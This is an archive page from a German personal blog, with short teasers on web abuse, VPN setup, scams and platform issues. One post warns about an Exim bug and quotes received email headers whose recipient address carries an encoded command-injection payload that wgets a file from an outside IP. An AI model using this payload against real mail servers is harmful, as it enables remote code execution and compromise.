Froschs Blog

Computer und was das Leben sonst noch so zu bieten hat

Zur Website | Impressum

Archiv der Rubrik 'Internet'

Joe Job via Piwigo-Plugin?

Donnerstag, 14. Mai 2020

Es gibt Netzmißbrauch-Varianten, die muß man echt nicht verstehen. Seit etwa zwei Wochen beobachte ich mindestens 40 Einträge pro Tag auf meiner Piwigo-Instanz über das Plugin Subscribe-to-Comments. Das hat dieselbe Funktion wie das gleichnamige Plugin für WordPress/ClassicPress, mit dem Unterschied, daß es nicht konfigurierbar ist: Man kann sich damit von der Site Mails schicken lassen, wenn zu einem bestimmten Beitrag bzw. Foto ein neuer Kommentar eingegangen ist – auch wenn man selbst nicht kommentiert hat.

Das betreffende Foto – und ja, es war immer dasselbe – hat bisher keine Kommentare bekommen und zeigt auch generell nichts Besonderes. Die verwendeten Mailadressen stammen offensichtlich von amerikanischen Mailhostern. Eingeliefert werden die Subscriptions, soweit ich das gesehen habe, ausschließlich über Tor-Exit-Nodes. Die Mailadressen, die dabei angegeben werden, existieren teilweise nicht einmal; ich hatte deshalb pro Tag etliche Bounces. Heute wurde mir dann klar, daß auch die Inhaber der existierenden Adressen nichts davon wußten: Ich bekam nämlich eine Spam-Beschwerde. (mehr …)


OpenVPN Server auf Port 443 für Android-Client

Dienstag, 10. März 2020

Ich bekam vorgestern aus meinem Umfeld die Bitte, einen OpenVPN-Zugang auf Port 443 für ein Android-Smartphone zur Verfügung zu stellen. 443 ist ja eigentlich der Port, der für https vorgesehen ist, der verschlüsselten Übertragung von Webseiten; für OpenVPN ist Port 1194 üblich. Das ist, wie in diesem Fall, sinnvoll, wenn man nur einen stark eingeschränkten Internet-Zugang zur Verfügung hat, bei dem nur die Standard-Ports für WWW und E-Mail zugänglich und alle anderen gesperrt sind. Außerdem sind wohl auch bestimmte IP-Ranges gesperrt. Nein, nicht Iran oder China. Ein Patienten-WLAN in einem deutschen Krankenhaus.

Auf meinem Hauptserver habe ich zwar einen OpenVPN-Server laufen, aber natürlich auf einem anderen Port, denn 443 ist hier für den Webserver reserviert. Allerdings habe ich ja vor gut zwei Monaten für ein Projekt zusätzlich einen kleinen V-Server angemietet, und auf dem läuft kein Webserver. Also habe ich da vorgestern mal ein neues OpenVPN draufgebaut, dem Nutzer die nötigen Dateien incl. Client-Konfiguration gemailt und – es funktionierte nicht. „TLS handshake failed“, sagte der Client. (mehr …)


gitweb und die robots.txt

Donnerstag, 5. März 2020

In den letzten paar Monaten fiel mir auf, daß unterschiedlichste Hosts ziemlich fleißig meine Gitweb-Site crawlten, und zwar allesamt mit der Crawler-Kennung „MJ12Bot“. Dieser Crawler wird tatsächlich dezentral betrieben, das heißt, wer mag, kann sich das Ding auf seinem Host installieren und ihn dann fleißig laufen lassen. Gemeldet werden die Daten dann wohl an eine zentrale Datenbank.

Weil ich das nicht wollte, hatte ich den MJ12Bot in die robots.txt für die Gitweb-Site eingetragen. Den MJ12Bot schien das nicht weiter zu stören. Ich nahm ihn dann vor einiger Zeit in den badbots-Filter von fail2ban auf, weil ich ihn offenbar nicht anders loswerden konnte.

Heute stellte ich dann „endlich“ fest, daß ich hier mal wieder ein PEBCAK produziert hatte … (mehr …)


#TwitterSperrt

Dienstag, 4. Februar 2020

Twitter sperrt offenbar immer mal wieder Accounts von Menschen, die sich gegen Rassismus, Sexismus, Ableismus und andere -ismen wehren. Allerdings ist nicht so ganz klar, nach welchen Kriterien; ich habe mehrfach beobachtet, daß nach solchen Sperrungen andere aus Solidarität denselben Wortlaut twitterten und nicht gesperrt wurden.

Daher wollte ich das jetzt mal selbst ausprobieren. Gesperrt wurde @nhile_de wegen folgendem Tweet:

Alle, die Witze über Asiat*innen und Coronavirus machen, bekommen eine Schelle. Don't even try to wrap your racism into a joke.

Daraufhin bekam Nhi eine 12stündige Sperre mit der Begründung: „Du darfst Dich nicht an der zielgerichteten Belästigung von Nutzern beteiligen oder andere dazu ermutigen. Darunter fällt auch, jemandem anderen körperlichen Schaden zu wünschen oder Hoffnungen in dieser Richtung zu äußern.“

[03.02.2020] Bereits in den Vormittagsstunden des 3. Februar bekam ich mit, daß auf verschiedenen Accounts die Aussage von Nhi aus Solidarität wortwörtlich wiederholt wurde.

Und jetzt wollte ich es wissen: Ich habe den Tweet von Nhi wortwörtlich wiederholt und nur den Hashtag #UnbanNhi angehängt: (mehr …)


Trojaner-Versand nach geknacktem Account

Montag, 16. September 2019

Richtig gelesen: „nach“, nicht „mit“.

Ich bekam heute Vormittag eine E-Mail, die scheinbar von einer Firma kam, mit der ich bis vor ein paar Monaten gelegentlich in Kontakt stand. Scheinbar, weil die Absender-Adresse nicht dazu paßte. Die Firma hat eine eigene Domain mitsamt MX, verschickt also normalerweise auch E-Mails unter dieser eigenen Domain. Aber die Absender-Adresse dieser E-Mail war eine völlig andere.

In dieser E-Mail wurde eine E-Mail von mir an die Firma zitiert, ein typischer Vollquote, darüber stand ohne Anrede „wie besprochen, in der Anlage die angeforderte [sic!] Informationen.“ Allerdings hatte ich diese E-Mail bereits Mitte Januar geschrieben gehabt; es war die letzte Mail, die ich dorthin geschickt hatte (und die war damals auch beantwortet worden). (mehr …)


Tschö WordPress, hallo ClassicPress!

Montag, 29. Juli 2019

Seit letztem Jahr schon geplant, endlich habe ich es geschafft: Den Wechsel von WordPress zum Fork ClassicPress. Schon vor längerer Zeit hatte ich einen Anlauf genommen und versucht, ein nicht mehr aktiv genutztes Blog testweise umzustellen, bevor ich an dieses hier gehe. Es funktionierte damals aber nicht; die Umstellung blieb mit einer Fehlermeldung quasi mittendrin hängen. Daher nahm ich erstmal davon Abstand, zu versuchen, auch dieses Blog umzustellen.

Der Wechsel wird durch ein Plugin bewerkstelligt, und dieses lag damals in einer Version 0.5 oder so vor. Entwickler behaupteten in ihrem Forum, der Fehler, der bei mir auftrat, sei weder bekannt noch nachvollziehbar. Also so ein Fall von „das passiert mal wieder nur mir“. (mehr …)


Western Union und der seltsame Mailserver

Samstag, 27. Juli 2019

Im Nachklapp zu der Gambia-Geschichte bleibt noch etwas, was ich mal separat aufschreibe, weil es damit vermutlich nicht direkt zusammenhängt. Kurz: Entweder hat Western Union einen kaputten Mailserver oder ist undicht.

Denn nur eine halbe Stunde nach der Anmeldung bei Western Union mit einer speziell dafür angelegten Mailadresse (so'n eigener Mailserver ist ja doch für was gut) versuchte ein Host über Tage hinweg, E-Mails an genau diese Adresse einzuliefern, scheiterte jedoch an meiner Konfiguration: (mehr …)


Gambia-Scam

Samstag, 27. Juli 2019

Manchmal fällt auch bei mir der Groschen nur pfennigweise. Ich wußte nicht, daß es diese Scam-Variante gibt, und hatte erst auch keine Hinweise gefunden. Erst heute, als ich die Suchbegriffe änderte. Mein Bauchgefühl war, sagen wir, indifferent – was ich seltsam fand, hätten ja auch, sagen wir, kulturelle Unterschiede gewesen sein können, und ich wollte sicher sein, mir da keine Vorurteile aufzubauen. Dabei hatte ich Verdachtsmomente gehabt. Allerdings ging es mir in den letzten Wochen auch nicht gut, meine Konzentration war tageweise ziemlich im Eimer. Das mag auch eine Rolle gespielt haben. – OK, von vorn.

Ich bin auf einen Scam hereingefallen, und ich erzähle Euch das ausführlich, damit es Euch nicht auch passiert. Es fing harmlos an: Ein Account mit dem Twitter-Handle @Modoulamindram3 folgte meinem. Nichts Ungewöhnliches. Ungewöhnlich war die Herkunft: Gambia, Westafrika. Das war am 24. Mai gewesen. Ich wurde neugierig und folgte zurück. Allerdings war mir durchaus aufgefallen, daß der Account bis zu diesem Zeitpunkt ganze 10 Tweets abgesetzt hatte, die direkt an andere Accounts gerichtet waren und meistens aus Smalltalk bestanden, also „wie geht es Dir“ oder „wie ist das Wetter bei Dir“. (mehr …)


Achtung, Exim-Bug unterwegs!

Donnerstag, 20. Juni 2019

Gestern erhielt ich zwei … „interessante“ E-Mails an den root-Account meines Servers. Der Body war jeweils leer. Der Header sieht so aus:

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Received: from service.com (flamingw.arvixecloud.com [108.175.157.131])
        by mail.atari-frosch.de (Postfix) with SMTP id B61EAC9E8;
        Wed, 19 Jun 2019 16:58:45 +0200 (CEST)

Darunter folgten noch 31 Received-Zeilen, die jedoch nur jeweils die Zahlen von 1 bis 31 enthielten. Die To:-Zeile ist dabei das Spannende: (mehr …)


#WirSindDieBots!

Samstag, 23. März 2019

Heute fanden europaweit Demonstrationen gegen die sogenannte europäische Urheberrechtsreform (eigentlich, wie @alios richtig darlegt, eine Verwerterrechtsreform) statt. Mein Plan war es gewesen, nach Heidelberg zu fahren, um dort die von Alex Schestag angemeldete Demo zu unterstützen und zu fotografieren, aber dann funkte mir leider eine Hals- und (mal wieder) Luftröhrenentzündung dazwischen, und ich mußte zu Hause bleiben.

Das gab mir immerhin die Gelegenheit, mal zu versuchen, die Teilnehmerzahlen zumindest bei den Demos in Deutschland zusammenzutragen. Es war gar nicht so einfach gewesen, dem Hashtag #Artikel13Demo zu folgen; da kam einfach deutlich mehr pro Minute rein, als ein Mensch direkt mitlesen kann. Daher fragte ich bei einigen Leuten, die aus bestimmten Städten berichteten, auch gelegentlich direkt nach, wieviele „Bots“ denn gekommen waren. Das hier ist das vorläufige Ergebnis: (mehr …)


Account bei Patreon schließen

Donnerstag, 7. Februar 2019

Einen Account auf Patreon aufmachen ist einfach.

Ihn aber dann zu schließen, ist so Passierschein-A38-mäßig. Das sieht dann nämlich so aus:

Man geht auf die Einstellungen für den Account, wo ganz unten die Option zu finden ist, den Account zu schließen. Natürlich mit fetter Warnung, daß das dann dauerhaft und für immer ist und so. Wenn man da draufklickt, wird aber keineswegs einfach der Account geschlossen. Das wäre zu einfach. (mehr …)


Abschied von Google+

Donnerstag, 31. Januar 2019

Bereits am 10. Dezember hat Google den Zeitplan bekanntgegeben, um Google+ zu schließen: Im April dieses Jahres soll es nun bereits soweit sein. Ich war auf dieser Plattform seit Mitte Juli 2011 aktiv, und da haben sich so einige Beiträge angesammelt. Viele davon sind „nur“ kommentierte oder auch einfach unkommentierte Links zu Artikeln. Trotzdem hatte ich die Idee, den ganzen Krempel auf einer Subdomain in ein ClassicPress einzulesen und weiterhin öffentlich verfügbar zu halten.

Die Sache hat allerdings so ein paar Haken.

Ich habe mir vorhin per Takeout meine Beiträge usw. von Google+ heruntergeladen. Was da ankam, war ein knapp 1 GB großes ZIP-Archiv mit sämtlichen Beiträgen und den dazugehörigen Metadaten und Fotos. Die Beiträge selbst sind in HTML gehalten, mit Inline-CSS. Das sieht dann so aus (Ausschnitt): (mehr …)


Polizeiticker

Mittwoch, 16. Januar 2019

Anhand der heutigen Meldungen zu den Ku-Klux-Klan-Durchsuchungen (zum Beispiel im Tagesspiegel: 100 Waffen sichergestellt: Razzia gegen mutmaßliche Mitglieder eines Ku-Klux-Klans) habe ich eben festgestellt: Der RSS-Feed von Presseportal/Blaulicht, abgerufen alle 15 Minuten, liefert mir nicht alle Nachrichten.

Ich hatte die Meldungen bei Tagesspiegel, Tagesschau, n-tv usw. gesehen und mich gewundert, warum ich die nicht im Feed des Blaulicht-Tickers habe. Also bin ich mal direkt auf die Website und siehe da: Drei Meldungen von verschiedenen Dienststellen gab es da von heute, einmal 14:00 Uhr, einmal 15:33 Uhr und einmal 15:34 Uhr (wobei sich zwei davon auf die erste vom LKA Baden-Württemberg beriefen). Alle drei waren nicht bei mir angekommen. (mehr …)


Wie mir das Internet™ eine neue Kamera schenkte

Montag, 28. Mai 2018

Am 26. April 2018 ging meine Canon EOS 350D in Rente. Und da dachte ich mir, vielleicht könnte mir dieses Internet™ ein bißchen dabei helfen, zumindest an einen gebrauchten 350D-Body zu kommen, ohne daß ich meine knappen Finanzen dafür überstrapazieren müßte. Sozusagen als Geburtstagsgeschenk. Also eröffnete ich am 10. Mai eine Sammlung auf Leetchi in der Hoffnung, mit ein paar Beiträgen zumindest einen Teil der dafür nötigen rund 75,00 € zusammenzubekommen.

Um einen üblichen Clickbait-Anreißer zu benutzen: Ihr glaubt nicht, was danach passierte … 😉 (mehr …)


Wie man ein Skype-Paßwort (nicht) recovert

Mittwoch, 7. März 2018

Heute Nachmittag saß ich vor einem schon recht betagten PC, einem Dell mit Pentium D, mit einem Windows XP. Die wichtigste Aufgabe an diesem PC: Das Skype-Paßwort des Nutzers herausfinden. Der Eigentümer des PCs hatte das Gerät mehrere Jahre lang nicht benutzt (ein relevanter Datei-Zeitstempel wies auf September 2015), hatte sein Paßwort vergessen und wollte es jetzt da rausgezogen haben, um Skype von einem anderen PC aus nutzen zu können. Sollte eigentlich zu machen sein, oder?

Tja, sollte. Die Praxis sah dann doch etwas anders aus … (mehr …)